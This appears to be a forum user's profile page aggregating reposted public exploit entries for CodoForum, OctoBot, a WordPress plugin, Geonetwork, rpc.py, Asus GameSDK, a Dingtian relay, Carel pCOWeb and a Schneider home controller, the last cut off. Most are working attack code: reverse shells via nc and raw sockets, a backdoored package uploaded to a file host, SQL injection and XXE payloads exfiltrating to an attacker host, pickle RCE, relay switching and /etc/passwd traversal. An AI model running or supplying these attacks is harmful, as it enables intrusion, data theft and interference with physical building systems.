Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    CodoForum v5.1 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE) # Date: 06/07/2022 # Exploit Author: Krish Pandey (@vikaran101) # Vendor Homepage: https://codoforum.com/ # Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip # Version: CodoForum v5.1 # Tested on: Ubuntu 20.04 # CVE: CVE-2022-31854 #!/usr/bin/python3 import requests import time import optparse import random import string banner = """ ______ _______ ____ ___ ____ ____ _____ _ ___ ____ _ _ / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ // |( _ ) ___|| || | | | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ | |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__ _| \____| \_/ |_____| |_____|\___/_____|_____| |____/|_|\___/____/ |_| """ print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)") print(banner) print("\nExploit found and written by: @vikaran101\n") parser = optparse.OptionParser() parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install') parser.add_option('-u', '--username', action="store", dest='username', help='admin username') parser.add_option('-p', '--password', action="store", dest='password', help='admin password') parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address') parser.add_option('-n', '--port', action="store", dest='port', help='listener port number') options, args = parser.parse_args() proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} if not options.target or not options.username or not options.password or not options.ip or not options.port: print("[-] Missing arguments!") print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]") print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help") exit() loginURL = options.target + '/admin/?page=login' globalSettings = options.target + '/admin/index.php?page=config' payloadURL = options.target + '/sites/default/assets/img/attachments/' session = requests.Session() randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10))) def getPHPSESSID(): try: get_PHPID = session.get(loginURL) headerDict = get_PHPID.headers cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1] return cookies except: exit() phpID = getPHPSESSID() def login(): send_cookies = {'cf':'0'} send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'} send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--" auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy) if "CODOFORUM | Dashboard" in auth.text: print("[+] Login successful") def uploadAndExploit(): send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID} send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'} send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n' exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy) print("[*] Checking webshell status and executing...") payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy) if payloadExec.status_code == 200: print("[+] Payload uploaded successfully and executed, check listener") else: print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])") login() uploadAndExploit()
  2. HireHackking

    OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) # Date: 9/2/2021 # Exploit Author: Samy Younsi, Thomas Knudsen # Vendor Homepage: https://www.octobot.online/ # Software Link: https://github.com/Drakkar-Software/OctoBot # Version: 0.4.0beta3 - 0.4.3 # Tested on: Linux (Ubuntu, CentOs) # CVE : CVE-2021-36711 from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import zipfile import time import sys import os def banner(): sashimiLogo = """ _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | _ _ _ _ \^^^^ == \_/ | | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. | / __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / | \__ | (_| \__ | | | | | | | | | | ||/ \_ \| / ( /\__,_( |_| |_|_|_| |_| |_|_| \________/ |_| |_| \033[1;91mOctoBot Killer\033[1;m Author: \033[1;92mNaqwada\033[1;m RuptureFarm 1029 FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(sashimiLogo)) def help(): print('[!] \033[1;93mUsage: \033[1;m') print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0])) print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.') def getOctobotVersion(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}/api/version'.format(RHOST, RPORT) else: url = 'http://{}:{}/api/version'.format(RHOST, RPORT) return curl(url) def restartOctobot(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT) else: url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT) try: requests.get(url, allow_redirects=False, verify=False, timeout=1) except requests.exceptions.ConnectionError as e: print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m') time.sleep(30) def downloadTentaclePackage(octobotVersion): print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion)) url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion) result = requests.get(url, stream=True) with open('{}.zip'.format(octobotVersion), 'wb') as fd: for chunk in result.iter_content(chunk_size=128): fd.write(chunk) print('[+] \033[1;92mDownload completed!\033[1;m') def unzipTentaclePackage(octobotVersion): zip = zipfile.ZipFile('{}.zip'.format(octobotVersion)) zip.extractall('quests') os.remove('{}.zip'.format(octobotVersion)) print('[+] \033[1;92mTentacle package has been extracted.\033[1;m') def craftBackdoor(octobotVersion): print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion)) path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/' injectInitFile(path) injectMetadataFile(path) print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion)) def injectMetadataFile(path): with open('{}metadata.py'.format(path),'r') as metadataFile: content = metadataFile.read() addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty')) addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")')) with open('{}metadata.py'.format(path),'w') as newMetadataFile: newMetadataFile.write(addPayload) def injectInitFile(path): with open('{}__init__.py'.format(path),'r') as initFile: content = initFile.read() addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,')) addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",')) with open('{}__init__.py'.format(path),'w') as newInitFile: newInitFile.write(addPayload) def rePackTentaclePackage(): print('[+] \033[1;92mRepacking Tentacle package.\033[1;m') with zipfile.ZipFile('any_platform.zip', mode='w') as zipf: len_dir_path = len('quests') for root, _, files in os.walk('quests'): for file in files: file_path = os.path.join(root, file) zipf.write(file_path, file_path[len_dir_path:]) def uploadMaliciousTentacle(): print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m') file = { 'file': open('any_platform.zip', 'rb'), } response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60) zipLink = response.json()['data']['file']['url']['full'] response = requests.get(zipLink, timeout=60) soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') zipLink = soup.find(id='download-url').get('href') print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink)) return zipLink def curl(url): response = requests.get(url, allow_redirects=False, verify=False, timeout=60) return response def injectBackdoor(RHOST, RPORT, zipLink): print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m') if RPORT == 443: url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) else: url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) headers = { 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', } data = '{"'+zipLink+'":"register_and_install"}' response = requests.post(url, headers=headers, data=data) response = response.content.decode('utf-8').replace('"', '').strip() os.remove('any_platform.zip') if response != 'Tentacles installed': print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m') exit() print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m') def execReverseShell(RHOST, RPORT, LHOST, LPORT): print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT)) if RPORT == 443: url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) else: url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) return curl(url) def isPassword(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}'.format(RHOST, RPORT) else: url = 'http://{}:{}'.format(RHOST, RPORT) return curl(url) def main(): banner() args = parser.parse_args() if isPassword(args.RHOST, args.RPORT).status_code != 200: print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m') octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','') if len(octobotVersion) > 0: print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion)) downloadTentaclePackage(octobotVersion) unzipTentaclePackage(octobotVersion) craftBackdoor(octobotVersion) rePackTentaclePackage() zipLink = uploadMaliciousTentacle() injectBackdoor(args.RHOST, args.RPORT, zipLink) restartOctobot(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False) parser.add_argument('-h', '--help', help=help()) parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main()
  3. HireHackking

    WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi # Author: nu11secur1ty # Date: 07.11.2022 # Vendor: https://wphive.com/ # Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9 # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin ## Description: The parameter `idx` from the Visual Slide Box Builder plugin app for WordPress appears to be vulnerable to SQLi. The attacker can receive all database information from the WordPress database and he can use it for very malicious purposes. [+] Payloads: ```mysql --- Parameter: idx (GET) Type: boolean-based blind Title: HAVING boolean-based blind - WHERE, GROUP BY clause Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) HAVING 1854=1854 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3) AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL) Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL# --- ```
  4. HireHackking

    Geonetwork 4.2.0 - XML External Entity (XXE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE) # Date: 2022-July-11 # Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb) # Vendor Homepage: https://geonetwork-opensource.org/ # Version: Geonetwork 3.10.X through 4.2.0 # Tested on: Microsoft Windows Server & Linux # Description: # GeoNetwork 3.1.x through 4.2.0 # During rendering pdf of map. # The XML parser is now configured securely to validate submitted XML document accepted from an untrusted source, which might result in arbitrary files retrieval from the server. ====================PDF RENDERING==================== POST /geonetwork/pdf/create.json HTTP/1.1 Host: REDACTED Content-Type: application/json Connection: close Content-Length: 563 {"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",], "format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34, 20037508.34], "tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]} The parameters baseURL will be your XML files : ====================XXE_ATTACK==================== ====================XXE.XML======================= <!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]> <foo>&external;</foo> ====================X.dtd========================= They will call the x.dtd <!ENTITY % stuff SYSTEM "file:///etc/hostname"> <!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>">
  5. HireHackking

    rpc.py 0.6.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 2022-07-12 # Exploit Author: Elias Hohl # Vendor Homepage: https://github.com/abersheeran # Software Link: https://github.com/abersheeran/rpc.py # Version: v0.4.2 - v0.6.0 # Tested on: Debian 11, Ubuntu 20.04 # CVE : CVE-2022-35411 import requests import pickle # Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py HOST =3D "127.0.0.1:65432" URL =3D f"http://{HOST}/sayhi" HEADERS =3D { "serializer": "pickle" } def generate_payload(cmd): class PickleRce(object): def __reduce__(self): import os return os.system, (cmd,) payload =3D pickle.dumps(PickleRce()) print(payload) return payload def exec_command(cmd): payload =3D generate_payload(cmd) requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) def main(): exec_command('curl http://127.0.0.1:4321') # exec_command('uname -a') if __name__ =3D=3D "__main__": main()
  6. HireHackking

    Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path # Date: 07/14/2022 # Exploit Author: Angelo Pio Amirante # Version: 1.0.0.4 # Tested on: Windows 10 # Patched version: 1.0.5.0 # CVE: CVE-2022-35899 # Step to discover the unquoted service path: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ # Info on the service: C:\>sc qc "GameSDK Service" [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: GameSDK Service TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : GameSDK Service DIPENDENZE : SERVICE_START_NAME : LocalSystem # Exploit If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".
  7. HireHackking

    Dingtian-DT-R002 3.1.276A - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass # Google Dork: NA # Date: 13th July 2022 # Exploit Author: Victor Hanna (Trustwave SpiderLabs) # Author Github Page: https://9lyph.github.io/CVE-2022-29593/ # Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html # Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download # Version: V3.1.276A # Tested on: MAC OSX # CVE : CVE-2022-29593#!/usr/local/bin/python3 # Author: Victor Hanna (SpiderLabs) # DingTian DT-R002 2CH Smart Relay # CWE-294 - Authentication Bypass by Capture-replay import requests import re import urllib.parse from colorama import init from colorama import Fore, Back, Style import sys import os import time from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def banner(): print ("[+]********************************************************************************[+]") print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |") print ("| Description: DingTian DT-R002 2CH Smart Relay |") print ("| Usage : "+sys.argv[0]+" <host> <relay#> |") print ("[+]********************************************************************************[+]") def main(): os.system('clear') banner() urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&" urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&" urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&" urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&" headers = { "Host": ""+host+"", "User-Agent": "9lyph/3.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": "http://"+host+"/relay_cgi.html", "Cookie": "session=4463009" } print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ") for i in range(5): time.sleep (1) print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="") try: if (relay == "1"): print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay1On) time.sleep (5) print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL) r = requests.get(urlRelay1Off) print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="") elif (relay == "2"): print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay2On) time.sleep (5) print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay2Off) print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="") else: print (Fore.RED + "[!] No such relay" + Style.RESET_ALL) except KeyboardInterrupt: sys.exit(1) except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except Exception as e: print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL) if __name__ == "__main__": if len(sys.argv)>2: host = sys.argv[1] relay = sys.argv[2] main () else: print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)
  8. HireHackking

    Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal # Exploit Author: LiquidWorm Vendor: CAREL INDUSTRIES S.p.A. Product web page: https://www.carel.com Affected version: Firmware: A2.1.0 - B2.1.0 Application Software: 2.15.4A Software version: v16 13020200 Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R applications and systems. It consists of programmable controllers, user interfaces, gateways and communication interfaces, remote management systems to offer the OEMs working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced to the more widely-used Building Management Systems, and can also be integrated into proprietary supervisory systems. Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. ======================================================================================= /usr/local/www/usr-cgi/logdownload.cgi: --------------------------------------- 01: #!/bin/bash 02: 03: if [ "$REQUEST_METHOD" = "POST" ]; then 04: read QUERY_STRING 05: REQUEST_METHOD=GET 06: export REQUEST_METHOD 07: export QUERY_STRING 08: fi 09: 10: LOGDIR="/usr/local/root/flash/http/log" 11: 12: tmp=${QUERY_STRING%"$"*} 13: cmd=${tmp%"="*} 14: if [ "$cmd" = "dir" ]; then 15: PATHCURRENT=$LOGDIR/${tmp#*"="} 16: else 17: PATHCURRENT=$LOGDIR 18: fi 19: 20: tmp=${QUERY_STRING#*"$"} 21: cmd=${tmp%"="*} 22: if [ "$cmd" = "file" ]; then 23: FILECURRENT=${tmp#*"="} 24: else 25: if [ -f $PATHCURRENT/lastlog.csv.gz ]; then 26: FILECURRENT=lastlog.csv.gz 27: else 28: FILECURRENT=lastlog.csv 29: fi 30: fi 31: 32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then 33: echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n" 34: cat carel.inc.html 35: echo "<center>File not available!</center>" 36: cat carel.bottom.html 37: exit 38: fi 39: 40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then 41: if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then 42: if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then 43: echo -ne "Content-Type: text/csv\r\n" 44: else 45: echo -ne "Content-Type: image/svg+xml\r\n" 46: fi 47: else 48: echo -ne "Content-Type: image/bmp\r\n" 49: fi 50: else 51: echo -ne "Content-Type: application/x-gzip\r\n" 52: fi 53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n" 54: 55: cat $PATHCURRENT/$FILECURRENT ======================================================================================= Tested on: GNU/Linux 4.11.12 (armv7l) thttpd/2.29 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5709 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php 10.05.2022 -- $ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:65534:65534:nobody:/home:/bin/false guest:x:502:101::/home/guest:/bin/bash carel:x:500:500:Carel:/home/carel:/bin/bash http:x:48:48:HTTP users:/usr/local/www/http:/bin/false httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash sshd:x:1000:1001:SSH drop priv user:/:/bin/false
  9. HireHackking

    Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution # Exploit Author: LiquidWorm <#SpaceLogic.ps1 Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit Vendor: Schneider Electric SE Product web page: https://www.se.com https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/ https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware Affected version: SpaceLogic C-Bus Home Controller (5200WHC2) formerly known as C-Bus Wiser Home Controller MK2 V1.31.460 and prior Firmware: 604 Summary: SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of the future, part of SpaceLogic. SpaceLogic C-Bus is a powerful, fully integrated system that can control and automate lighting and many other electrical systems and products. The SpaceLogic C-Bus system is robust, flexible, scalable and has proven solutions for buildings of the future. Implemented for commercial and residential buildings automation, it brings control, comfort, efficiency and ease of use to its occupants. Wiser Home Control makes technologies in your home easy by providing seamless control of music, home theatre, lighting, air conditioning, sprinkler systems, curtains and shutters, security systems... you name it. Usable anytime, anywhere even when you are away, via preset shortcuts or direct control, in the same look and feel from a wall switch, a home computer, or even your smartphone or TV - there is no wiser way to enjoy 24/7 connectivity, comfort and convenience, entertainment and peace of mind homewide! The Wiser 2 Home Controller allows you to access your C-Bus using a graphical user interface, sometimes referred to as the Wiser 2 UI. The Wiser 2 Home Controller arrives with a sample project loaded and the user interface accessible from your local home network. With certain options set, you can also access the Wiser 2 UI from anywhere using the Internet. Using the Wiser 2 Home Controller you can: control equipment such as IP cameras, C-Bus devices and non C-Bus wired and wireless equipment on the home LAN, schedule events in the home, create and store scenes on-board, customise a C-Bus system using the on-board Logic Engine, monitor the home environment including C-Bus and security systems, control ZigBee products such as Ulti-ZigBee Dimmer, Relay, Groups and Curtains. Examples of equipment you might access with Wiser 2 Home Controller include lighting, HVAC, curtains, cameras, sprinkler systems, power monitoring, Ulti-ZigBee, multi-room audio and security controls. Desc: The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in 'delsnap.pl' Perl/CGI script which is used for deleting snapshots taken from the webcam. ========================================================= /www/delsnap.pl: ---------------- 01: #!/usr/bin/perl 02: use IO::Handle; 03: 04: 05: select(STDERR); 06: $| = 1; 07: 